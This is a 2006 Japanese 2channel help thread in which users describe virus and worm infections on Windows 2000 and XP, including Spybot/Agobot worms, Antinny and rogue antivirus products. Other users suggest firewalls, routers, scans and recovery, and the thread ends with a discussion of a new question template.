>>881 自己紹介お疲れ様です ト、 ヽ、 ,.イ i
i \ \ ,... -- 、 / / i
| ヽ ヽ':::::::::::__i__ヽ、/ l
| 〉'´:::::::::::::::| 父|::::::\ i
i ,r'.: \ /:`ヽi
ゝ' fヽ ヘ :::ヽ
/ _ 弋リ ___ じ :::::i/
l ``─ (__ノヽ__) '´::i
|  ̄ ̄``‐ i i ゚ -‐!─ カスども人様の役に立つようなことかけ
| _,-‐ i i _i__
ヽ ‐'´ V .::::i
ゝ、 /} /}.::::/
`ゝ、 i / { //
(`ヽ フ/‐ゝ---'ヽ/ i
l\ ' ノ 八 人 '´ ノ
∧ヽ ,ィ´ヽ
i ヽ ヽ、,.-─- 、 ,// i
l 〉´::::::::::::::::::::::::r' / i
| /:::::::_/_:::::::::::::::::::::::\ }
レ' /爻/ ::::::::\ /
/ \ / :::::::ヽ〈
/ \ / ::::::::::l
─-ト、  ̄  ̄ ,.-‐'´ ̄ ::::::::l
─‐i‐ (_人__) ゚ ___ :::::::} 全部QAにしろ 役にたてや
_,i-‐ i / ‐-、 .:::::/
\ `´  ̄``.:::::/
ゝfヽ rヽ .::::::/
>>868 まずは何のウィルスが検索されたのか確認して、ウィルスバスターのサイトで確認
また、下手に感染しているファイルをダウンロードしたらファイル自体を削除するか、隔離すること!
【使用OS】 Windows2000 pro 【WINDOWS UPDATE】 SP4など入れられるものは全て 【ウィルスソフト】 Avast SpybotSD マカフィーpro体験版 a-squared とっかえひっかえ試してみました 【UPDATE】 最新 【スキャン】 ウイルスバスターオンラインスキャン Avastでは検出されました 他はヌルー 【症状】 Cドライブ直下にj1ztfr6.exe p9c6f7z6x9i5.exe gj1ztho6.exe 等のファイルが現れる そのまま起動しているとたまにDOS窓が立ち上がって上のexeが何かをしている WINNTフォルダのalg.exe services.exe explore.exeがOS起動直後に外部にアクセスしようとする VBオンラインでは、 WORM_SPYBOT.QL WORM_SPYBOT.EAL WORM_SPYBOT.DZW WORM_AGOBOT.HN WORM_AGOBOT.BFS DIAL_QDIAL.AJ がWINNTフォルダの上記exe群の中から、 またAvastがしょっちゅうWin32:Dialer BZ[trj] をCのRECYCLERから見つけてきます 【やったこと】 HDD全フォーマットして セーフモードで起動して各種ワクチンソフト、FWインストール 【とった処置】 警告が出る度に全て駆除するが効果なし 少なくとも再起動するとまた現れる OS関連以外何一つファイルがなくても起きる ウィンドウズアップデートで2000のSP4、IE6をインストールしようとすると高確率でエラーが出る (「FTP.EXEは使用中です」、又は「エラーが発生したため explore.exeを終了します」) これはセーフモードでも起きたが何度か試したらある時成功した で、とりあえずHDD全フォーマットして2kをクリーンインストールしたんですが、インスト直後はいいものの ネットに繋いだ瞬間にCにまた p9c6f7z6x9i5.exe などが沸きます これは単に駆除の仕方が悪いんでしょうか それともHDD自体がフォーマットしても消えないなにかに汚染されてるんでしょうか?
>884 もしかして、ルータが無くて直でネットに繋いでいるって事かい?
886 :
884 :2006/12/18(月) 19:26:05
申し訳ありません そっちの環境を書くのを忘れてました しかも特殊なのに・・・ ここは大学寮でルータは大学の管理する鯖のほうに置いてある筈です 部屋のジャックにケーブルをつっこむだけで繋がると言う仕様です 上流ではかなりの数のポートがふさがっておりWebsenseがかましてあります 同じ回線を使っている筈の友人には同じ症状にかかった人はいないんです・・・が
>>542 さんとまったく同じ症状になってしまったのですが、解決策は無いのでしょうか・・・
同じようにセーフモードでスキャンしても見つからず、
ウィンドウのアクティブが頻繁に変わるのがきついです。
これ打ってるときも変わりまくりorz
>>887 ツール>アドオンの管理>怪しいアドオンを無効にする
>>888 Win2kなのでそれが出来ないようです。
今ググっていろいろ探してますが・・・
>>889 それは既に試しましたが駄目でした。
ルータが入っているかどうか、確認する方法はたしかこれで良いか…な? windows2000はわからないが、WindowsXPに例えると、 スタートをクリックして、ファイル名を指定して実行をクリックして、 cmdと入力してEnter。 コマンドプロンプトっていう黒い画面が起動するので、 ipconfigと入力してEnter。 IPアドレスが192以外で始まるアドレスならルータ無し。 192で始まるアドレスならルータ有り。 確認だけしてくれ。
急にPCが重くなったからタクスマネージャのプロセス開いたらSOUNDMAN.EXEっていう見慣れないの発見 いつもよりプロセス数増えてるし・・・今スキャン中だけど調べてたらネット切れとか書いてあってがくぶる
>891は>886へのレス
894 :
888 :2006/12/18(月) 20:16:27
895 :
884 :2006/12/18(月) 20:34:55
>>891 ipconfigでは192.1681.1などはなかったです
ローカルIPしかもらってない状況なのかな
デフォルトゲートウェイ が**.*.***.1で
IPアドレスが **.*.***.217 (*は同じ数字)
サブネットマスクは255.255.255.0
>>892 SOUNDMAN.EXE Realtek Realtekのオーディオデバイスのインストールに含まれるプロセスで、実行時はタスクトレイに表示される。
SOUNDMAN.EXE ワーム AGOBOTワームはWindowsシステムフォルダにSOUNDMAN.EXEとして自身をコピーします。
どっちかだな
プロパティ開いてRealtek製ならセーフ
>895 ルータが入ってないって事は、ネットに繋いだ瞬間即やられるはずだ。 ファイアーウォールソフトなんて入れてない状態(>884の >【やったこと】 HDD全フォーマットして セーフモードで起動して各種ワクチンソフト、FWインストール) って言うので、FW付きセキュリティソフトを購入して、リカバリ。 ネットに繋ぐ前にセキュリティソフトをインストールして、FWを有効にしてからネットに 繋ぐ。もしくはルータを買ってきてルータを経由してネットに繋いで、即MU。 この手順なら大丈夫だと思う。
カスペなら2000も対応してるから体験版でもインスコすれば?
>>884 ネットワークワームだ
135と445が開いているからやられる
インストールされるものはその時によりまちまち
901 :
884 :2006/12/18(月) 21:44:34
助言ありがとうございます PC1台しかないしいいか?とルータを用意してないのが悪かったようですね リカバリしたらできるだけオフラインで堅固な状態にしてからオンラインにしてみます あとオフラインでカスペルを当てようとするとIEアップデートしてないので駄目なような気がしますが IE6もSP4のようにローカルに保存してオフラインでインストールできるんでしょうか?
まあ、ネットワーク感染型ワームということは話だけで分かるんだが、 どういった手順でセキュリティソフトをインストールしたのかが知りたいわけよ。 なにしろWindowsXPみたいに標準でFW搭載されていないOSだからな>Win2K >901 そのほうが良いかもしれんな… オフラインでインストールはあらかじめ、インストールCDが必要だったと思う。
>>901 2000はSP4でもネットワークワームにやられるから
ルーターかファイアーウォールは必然
905 :
884 :2006/12/19(火) 15:45:15
Zonealarmでちびちび許可しながらインスト成功しました 今の所被害はないので大丈夫だと思います 皆様どうもでした
906 :
素人 :2006/12/19(火) 18:29:28
きのうプロバイダーから手紙が来ました。 その手紙には、私のPCから迷惑メールが送信された、もう一度やったら退会〜 などと、見に覚えの無いことが書かれていました。 どうも、自分が拡大被害の中継点になっているか、何者かに不正にアクセスされている ようです。 普段はWEBメールを使っているのですが、一応プロバイダーのメールも設定しておこう、 と思って、Outlook Expressを開いたのですが、どうも設定できなかったので、 「おかしいな?」とは思っていました。 おそらく、なんらかのウイルスなり、不正にアクセスされているのかも知れません。 解決法を教えてください。 avast antivirusというフリーソフトを入れましたが、ウイルスのようなものは無かったみたいです。
>>906 >OEが、どうも設定できなかった
ISPにIDとPassの変更を依頼
908 :
名無しさん@お腹いっぱい。 :2006/12/19(火) 19:30:25
AV-Test.orgによるテスト結果(2006年10月2日付)
http://www.eweek.com/article2/0,1895,2023127,00.asp ”AV-Test ran a huge test of backdoors (59,053),
bots (70,658) and trojan horses (159,971) for a total of
289,682 malware samples.”
# 1 WebWasher 99.97% | #21 F-Prot 77.88%
# 2 AntiVir 99.95% | #22 Command 77.11%
# 3 AVK 2007 99.95% | #23 Microsoft 76.18%
# 4 AVK 2006 99.89% | #24 Ewido 74.67%
# 5 Symantec 99.04% | #25 Sophos 65.55%
# 6 Kaspersky 98.86% | #26 eSafe 59.34%
# 7 F-Secure 98.24% | #27 UNA 58.76%
# 8 BitDefender 96.51% | #28 QuickHeal 55.72%
# 9 Norman 96.34% | #29 ClamAV 48.71%
#10 Nod32 95.80% | #30 eTrust-VET 48.37%
#11 Avast! 95.17% | #31 eTrust-INO 41.92%
#12 AVG 94.78% | #32 VirusBuster 40.94%
#13 Fortinet 94.65%
#14 McAfee 93.99%
#15 Rising 91.18%
#16 Panda 90.45%
#17 Dr Web 90.38%
#18 Trend Micro 90.03%
#19 Ikarus 84.77%
#20 VBA32 81.28%
VB100% award 12月の結果
・合格 Antivir, avast!, AVG, AVK 2007, eTrust, Kaspersky, McAfee, NOD32, QuickHeal, Sophos, Symantec, VirusBuster
・失格 Fortinet, Norman, Trend Micro
910 :
素人 :2006/12/19(火) 19:36:21
>>909 黙れカス、調子こいてんな
ウンコ野郎が
もっと長く詳しく教えろ ボケ
(^Д^)ギャハ!↑みなさん、この人のレスどう思いますか♪なんてありきたりなんでしょうね♪ 誰もが皆、一瞬つけてみたくなる発想のレスです♪ しかし、賢明な人はその自らの短絡的思考を野放しにする事を嫌がり、 こういうレスは控えます♪しかし、この人はしてしまったのです(^^; 「誰もが思い付くような事」を堂々と♪ この人にとってこのレスは何なのでしょうか♪ このレスをしている間にも時間は刻々と 過ぎ去っているのです♪ 正にこの人のした事は「無意味」「無駄」でしかありません♪ああ・・・何ていう事でしょう(^^;ワラ 図星で泣いちゃうかも(^^;ワラ
なりすましでしょ、これ
913 :
名無しさん@お腹いっぱい。 :2006/12/19(火) 20:14:54
>>911 お前の生きている時間も十分無駄だけどな
914 :
名無しさん@お腹いっぱい。 :2006/12/20(水) 01:05:00
嫁さんのPCが数日前に突然シャットダウンし、それ以降はメールを見ようとする と、必ずパスワードを要求するようになりました。 また、妙なダイアログ(男性がPCに向ってるイメージと英文でウィルスを〜助け るという内容のメッセージ)が時たま表示されるとも言ってます。 本人は妙なサイトを見ることはなく、メールも知人か私のものしかやり取りして いませんが、症状からするとアドウェアのような気がします。 このようなダイアログを表示するものをご存知ないですか?
>>914 感染していると思ったなら、ここで聞く前にまずは自分で
スパイウェアならSpybotとAd-aware入れてスキャンするなり、
ウイルスならオンラインスキャンするなりしましょうね。
そうすれば、何に感染したのかわかるから
916 :
名無しさん@お腹いっぱい。 :2006/12/20(水) 03:37:40
>>915 そうですね、こんなクズ回答ばかりならばそれもやむなしですね
「やむなし」ねぇ・・・ そういうもんか? セキュリティ意識の違いというか何か次元の違うものを感じるが・・・
まず英語も読めない嫁さんをどうにかした方がいいんじゃね
なんか、防火対策・消火対策もしていなかったのに、 火事の真っ最中に消火活動も自発的にせず、 他人に火元や火事原因を聞きまわっているようにしかみえないけどなあ。
多分釣りなんじゃね?
いや。プロ初心者は侮れないぞ。 聞くだけ聞いて解決したら、それで終わり。 全然学習する気がないから、同じ事を何度も訊く。
【使用OS】XPSP2 【WINDOWS UPDATE】自動 【ウィルスソフト】avast! 【UPDATE】最新 【スキャン】できません 【症状】標準検査をしようとすると途中で強制再起動 【やったこと】スパイウェアのスキャン等など自分のわかる範囲内のことを 【とった処置】なし 最近よくフリーズしたり動作が重いのでウィルスかなんか入ってるのかな?と思いスキャンをしたところ… 必ず強制再起動させられます わたしじゃ対処法がよくわからないので助言お願いできませんでしょうか?
>922 >【症状】標準検査をしようとすると途中で強制再起動 セーフモードでも同じ結果になるか?
>>923 ダメでした
やはり途中で強制再起動
その際に青い画面が一瞬。。。
>>924 もういっそのことavast!の再インストールを試してはどうだろうか。
>>921 色々問題があるだろ、記憶もあるし電子ノートみたいなものも普及してねー死
onenoteとか津川ねー奴多すぎ
>>922 > 最近よくフリーズしたり動作が重い
これがまず問題だよな。ウイルスが原因とは限らないわけで。
まずは、スタートメニュー、ファイル名を指定して実行で
CHKDSK /Fをやってみる。
それから、システムツールでデフラグを掛けてみると良いんじゃないかな?
928 :
名無しさん@お腹いっぱい。 :2006/12/20(水) 20:08:39
>>848 いいたいことはだいたい分かるけどちとおれにゃ難しいな。
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
俺は入れ直しかノートンゴースト使ってるけど
>922 いっそ、リカバリでもしたほうがいいんじゃない? avastでスキャン時に強制再起動は、間違い無くウイルスの仕業だと思う。 そういった動作を行うウイルスもある。 avastはもしかして、この「最近よくフリーズしたり動作が重いのでウィルスかなんか入ってるのかな」 という症状が出てきた後に入れた? >青い画面が一瞬 英語で文字が書かれている奴だな。 もう一度、avastでスキャンしてその画面が出てきたら目を凝らして見てくれ。 初めのほうに「STOP:〜」という英語が書いてあるか確認を。
>>922 avast!入れる前には何のウィルス対策ソフト入れてたの?
ソフトによってはアンスコしても残骸が残っていてスキャンを邪魔する場合もあるので
>>932 ちなみに、貴方が出した画像はチェックディスク画面。
Windowsが不正終了した時に、ハードディスクにエラーがないかどうか、
確認するため、自動的に起動するプログラム。
その画像だけでは、不正終了が起こったことに対して、
Windowsが自動的に対応した、ということしか判らない。
>932 これ、かなり深刻なんじゃねーか。 FWやルータなどのネットワーク感染型ワームの予防ソフトは入ってるよね?
書きこむ前にリロードすれば良かった 激しく恥ずかしい自分w
XPは持っているんだがチェックディスクしたことが無いから、 素で思いっきり勘違いしたよ。 そういえば、WindowsXPで不正なシャットダウン(ブルースクリーン)の後に システムを再起動させない設定っていうのどうやるんだっけ? 誰か>932に教えてやってくれないかな。
>>938 マイコンピューターを右クリック>プロパティを選択
>詳細設定タブをクリック
>起動と回復の項目の設定ボタンをクリック
>システムエラーの項目の自動的に再起動のチェックを外す
941 :
939 :2006/12/20(水) 22:12:04
セーフモードじゃなくてf8連打するってことね
>939 こんなのがあるんだ…初めて知った、(メモメモ >940 わざわざどうもw 今使ってるのがWin98SEなもんで。 ということで、>932 >939-940のどっちかをやってみて、もう一度Avast!でスキャンして ブルースクリーンになったらその画面をうpして。
>941 今、俺が使っているOS(Win98SE)はF8連打しなくても、 メーカーロゴ表示→Windows98ロゴ表示の間 (メーカーロゴ表示後の黒画面になったら直ぐ)に F8「ポチッとな」でセーフモードなどの起動選択メニューが出るよ。 WindowsXPでもタイミングさえ合えば、F8「ポチッとな」で 拡張オプションメニューが出るんじゃない。 ねみ…
946 :
939 :2006/12/21(木) 19:58:54
>>945 そっすね
以前は「ポチッとな」でやってたんですけど サポから連打しろといわれてそのままやってるだけでして
ところで922氏から返信ないすけど
avast ブルースクリーン でぐぐったら結構似た症状のひとが多いんで マシンや他ソフトとの相性問題かもしれないすね
947 :
922 :2006/12/21(木) 20:54:39
イロイロ試してました
>>944 の方法試したんですけど変わらず
多少動作は軽くなった…気がします
でも強制再起動は相変わらず…
Local Settingsってフォルダスキャンしてる時に強制再起動するんですけど、これは何か関係ありますか?
あとハードウェアの安全な取り外しってのが前から出てるんですけどこれも関係あるのかな…
>>946 前までは大丈夫だったんですけど、唐突にこの様な状態に…
他のソフトが影響してるのかな
>947 んー… >922のほうで"フリーズしたり動作が重くなる" と言った症状が出てくる前、何かのソフトをインストールしたとか、 ドライバなどの周辺機器を入れたとか、思い当たるは無い?
949 :
922 :2006/12/21(木) 21:54:49
入れたとしたら…スキャナ?あとはゲーム用のコントローラーぐらいですかね 他に思い当たるものは…
>949 それらの機器を取り外した状態でも…やっぱりなるか… 大事なデータのバックアップはちゃんと取ってありますよね?
気になって「ハードウェアの安全な取り外し」というのでググってみたんだけど、 これは周辺機器が接続されている場合に表示されるらしく、 周辺機器が接続されていない時や、特定の機器が接続されている時は、表示されないらしい。
お尋ねしても宜しいでしょうか。 【使用OS】 Windows XP SP2 【WindowsUpdateしてるか】 自動更新ですが、念のため週に1〜2回手動で確認しています。 【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006 【ちゃんとUpdateしてるか】 はい、ちゃんと最新の状態に更新しています。 【スキャンした結果(ウイルス名・発見場所)】 発見できない。 【別のオンラインスキャンしたならその結果は】 シマンテックやバスターのオンラインスキャンでは、WinAntiVirus PRO 2006を検出 【症状を具体的に、分かる限りすべて書く】 WinAntiVirus PRO 2006を入れてから動作が悪くなった。 【何をしたらそんなことになったのか】 貴方のパソコンは「ブラックウォーム」に感染される恐れがある。 セキュリティセンターは貴方のパソコンに「セキュリティミッス」を検出しました。現在使っているアンチウィルスでは 情報の流出を防ぐ事ができないと言われた。 【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール 【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。
よぅ、
>>952 …
∧_∧ ∧_∧
( ・∀・) ∧ ∧ ? (´∀` ) spybotS&Dがほしいんだろ?
( ) (*‘ω‘;*) ( )
| | |. ( ) | | |
(__)_) v v (_(__)
おらあああ!! これでもくらえや!!!
…! .∧_∧
―=≡三 ∧_∧ \从从/// (´∀` ) 三≡=―
―=≡三と( ・∀・)つ''"´" ⌒_ノ;*;''"´"''::;:,( つ 三≡=―
―=≡三 ヽ  ̄ ̄⌒)>“ω(;;;((⌒ ̄ ̄ ̄_ ) 三≡=―
―=≡三 / / ̄ ̄´""'''¨ (;;#':*,')´''::;;;;::'''"´ ̄ヽ \ 三≡=―
―=≡三 \__); /// v v \\\ (__) 三≡=―
【使用OS】 WindowsXPsp2 【WINDOWS UPDATE】 自動更新なので最新 【ウィルスソフト】 DriveCleaner 【UPDATE】 してる 【スキャン】 ファイルの経歴などが検出されて削除した 【症状】 ポップアップがいきなり出てきて 「ファイルがコンピュータにインストールし【プライバシーを進入】するのがたぶん分からず、 お仕事と【ご結婚が危険】です。」というメッセージが出て来ます。 【やったこと】 DriveCleaner購入 【とった処置】 彼女との結婚が来月にあるので、パソコンの履歴から浮気がばれるのを 恐れてDriveCleanerを購入。 スキャンしたら危険な経歴が検出されたので削除しました。
(・∀・)ニヤニヤ
958 :
名無しさん@お腹いっぱい。 :2006/12/22(金) 21:23:03
今スキャンしたら 削除しました: ウイルス Worm.Win32.Antinny.ayファイル: C:\WINDOWS\Temp\PR18B.tmp/UPX 削除しました: ウイルス Worm.Win32.Antinny.ayファイル: C:\WINDOWS\Temp\PR18A.tmp/UPX 洒落タマに感染してますか? Temp\PR18A.tmp/UPXとはどういったファイルでしょうか。
959 :
856 :2006/12/22(金) 21:49:28
横レススミマセン 更に非常に亀レスも・・・ どうもHDDのトラブルのようです。確認中ですが、レスをくれた皆様方に報告して おこうと思いまして、とりあえずの経過を書きました。 レスを頂いたみなさま有難う御座いました。引き続き奮闘中です・・・
地図がどうとか言うアプリを拾っただろ。 P2Pは早く止めたまえよ。
>>959 奮闘中も行けど、今のHDDが何とか動いているうちに、新しいの買ってきて必要なデータを退避させたほうがいいんじゃない?
962 :
958 :2006/12/22(金) 23:47:16
【使用OS】XP 【WINDOWS UPDATE】SP2 【ウィルスソフト】マカフィーウイルススキャン 【UPDATE】4ヶ月ほどしてなかった・・・悔い改め今度から更新します 【スキャン】不可(しようとするとOSが落ちる) 【症状】以前からいきなりIEのページが「WhenUoffer」に変わること多々、最近突然OSがシャットダウン、その後頻繁にシャットダウンするように。再起動後「システムは深刻なエラーから回復しました」と表示。IEもすぐに強制終了するようになった。Janeは使用可 【やったこと】DaemonTools(WithWhenU)でゲームをプレイ 【とった処置】システムの復元、だえもんの削除、WhenUサーチバーの削除
知人からのメールの本文の下に --------------------------------------------------- Letter content was scanned by WinAntiVirus Pro 2006. No threat detected. Please visit www.winantivirus.com for more details. ↑こんな英文が書かれてあったのですが何でしょうか? よろしくお願いします。
>>964 なんて書かれているかくらいは当然わかるよね?
>>965 はい、それなりに判るのですが
何故、勝手に書かれてあったのか疑問で…
相手方も初心者ですのでなんと言えばよいのか(汗)。。
>>966 WinAntiVirusを使っているわけじゃないからよくわからないが
そっちの方のスレでそういう書き込み機能があるのかどうか聞いてみる。
あなたか、相手方のどちらかがWinAntiVirusお使いじゃないんですか?
ノートンの場合添付ファイルがウイルスなどで削除された場合、
メール本文にその旨書き込まれる仕様になってましたが。
>>964 AVGもデフォルトだとメールの最下部に証明書(ウィルススキャン済み)が付くよ。
一部の国ではこうするのがマナーなのかもしれない。
>1のテンプレ変えた方が良くないけ? 【ウィルスソフト】なんて、そんなもの入れたら大変なことになるやろ。 だから新テンプレの候補として↓が適切かと。 質問の時はテンプレを使って質問してください。 テンプレ 【使用OS】 【MicrosoftUpdate】 【使用セキュリティソフト】 【セキュリティソフトの定義ファイルは最新の状態であるか】 【ルータの有無】 【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 【どんな症状が出るか】 【症状が出る前に何をやったか】 【症状を解決しようとどのような処置を取ったか】
【ウィルスソフト】ワロタ 確かにそうだ。
あとウイルスをウィルスと書くのはやめてほしい
972 :
例 1 :2006/12/24(日) 00:42:05
【使用OS】vista RC1 【MicrosoftUpdate】最新 【使用セキュリティソフト】NOD32 V2.7 【セキュリティソフトの定義ファイルは最新の状態であるか】最新 【ルータの有無】有 【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Win32/Delf.NEA 【どんな症状が出るか】デスクトップにドクロマーク 【症状が出る前に何をやったか】sexe.jpgをクリック 【症状を解決しようとどのような処置を取ったか】reverte to the snapshot 【その他】おっおっお
【P2P(ファイル交換ソフト)は使っているか】 これをテンプレに入れようと考えたんだが、 【どんな症状が出るか】 【症状が出る前に何をやったか】 というテンプレ見ればなんとなく分かるし、 怪しいと思ったらその都度聞けばいいし。
次スレの番号は41だからね!!!
977 :
966 :2006/12/24(日) 18:49:33
ありがとうございます。 参考になりました。 早速対処するように連絡します。
>>975 Operaで見たら少し重くなるだけだったが・・
>>978 ループタグってなんでつか? ぐぐってみるが・・・
>>979 どもです、勇者。 じゃIP確認への釣りとか・・・。
相手の意図がわからない。
新しいテンプレ(一部追記)は以下の通りで異論は無いでしょうか。 【使用OS】 【MicrosoftUpdate】 【使用セキュリティソフト】 【セキュリティソフトの定義ファイルは最新の状態であるか】 【ルータの有無】 【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 【どんな症状が出るか】 【症状が出る前に何をやったか】 【症状を解決しようとどのような処置を取ったか】 【その他の質問】 >【ルータの有無】 ぶっちゃけこれ要らないんじゃないと思う人もいるけど、 質問者がWindows2000でルータ無しでFWソフトも無しの環境で、 リカバリしなくちゃいけないような症状に陥っている場合、 それでリカバリしたは良いけど、その直後にネットに繋いで即再感染 という自体も有り得るので。(その際はルータか、FW付きアンチウイルスソフトの購入を奨める) WindowsXPの場合はデフォルトでFWが入ってる(SP2の場合はデフォルトで有効になってる) から、こちらのOSの場合はルータが無くてもFWを有効にさえしとけば、外部からの 侵入はとりあえず遮断できる。
知人から相談受けました。 【使用OS】2kpro 【WINDOWS UPDATE】自動でやってるとのこと 【アンチウィルスソフト】ZERO 【UPDATE】自動 【スキャン結果】ホワイター 【症状】Dドライブのファイル削除 【やったこと】エロゲインスコしようとしてホワイターオートラン起動 【とった処置】起動してしまったホワイターを途中で止め、ファイル削除とレジストリ削除 本人もある程度スキルあるんですが、うっかりドライブ買い替えた後のオートランを無効にしわすれてホワイターが動いてしまったそうです。 ホワイターを途中で止めた為、被害がDドライブの7割程で済んだそうです。 で、相談受けたのですが、この消されたファイルをファイナルデータ等で遡及出来ないか?ってことです。 ホワイターがファイルを書き換えてから削除してなければ…と思うんですが… とりあえず駄目元でファイナルデータ買わせて見ようと思ってますが、どうでしょうか?
985 :
983 :2006/12/25(月) 12:09:19
>>984 セキュリティに関して素人なのにスキルがあるなんて書いて申し訳ありません。
ファイルデータに体験版があるとはしりませんでした。
取り急ぎ、ファイルデータの体験版を試させてみます。
失礼しましたm(__)m
986 :
名無しさん@お腹いっぱい。 :2006/12/25(月) 14:38:53
987 :
名無しさん@お腹いっぱい。 :2006/12/25(月) 15:13:54
>986に追加です。こんな状態になったのは2ちゃんのどこかの板に貼られてたURLを踏んでからです
>>986 1.アドオンの管理におかしなアドオンがあれば読み込み無効
2.信頼済みサイトにおかしなURLが追加されてないかを確認(あれば削除)
3.スパイウェア駆除ソフトを使う(Ad-AwareやSpybot)
990 :
983 :2006/12/25(月) 19:34:56
>>984 見受けたところあなた様にスキルがあるようには思えませんが、
パソコンの前で王様気取りになってらっしゃるだけではないですか?
裸の王様
>>982 乙です 私は異論ありません
あとBOTに関してのテンプレを入れたほうがいいのではないかと思います
以下サイバークリーンセンターからの引用ですがいかがなものでしょうか
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
992 :
名無しさん@お腹いっぱい。 :2006/12/25(月) 19:36:03
>989 ごめんなさい、アドオンをどうやって表示すればいいかわかりません。あと、他のサイトを表示することができません。リカバリーしてもダメでした・・・orz
993 :
名無しさん@お腹いっぱい。 :2006/12/25(月) 19:47:22
>>991 俺はもっとテンプレをたすべきではないかと思う
そうしたら初心者 俺もだけど
わかりやすくなると思うし、事実上2chの9割はそこに価値があると思うのだが
今まであったのをQAにしてもいいだろうし
>991 BOT系ウイルスか… そういえばサイバークリーンセンターにSPYBOT(こちらはBOT系ウイルス) とspybot S&D(こちらはスパイウェアの予防・駆除ソフト)の両者の違いが書いてあったかな? >993 Q&Aは例を上げると↓とか? Q回答者が質問者に対して「リカバリしなさい」と言うのはどうしてですか? A基本中の基本だからです。 ここまでかな。
>>991 ファイアーウォールかルーターでオープンポートをブロックしとけば
取り敢えず外部からのリモート操作は防げるから問題ない。
997 :
名無しさん@お腹いっぱい。 :2006/12/25(月) 20:18:05
>994 なぜか表示されませんorz
998 :
名無しさん@お腹いっぱい。 :2006/12/25(月) 20:19:35
梅
>997 ブラウザはIE6SP2か?
産め
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。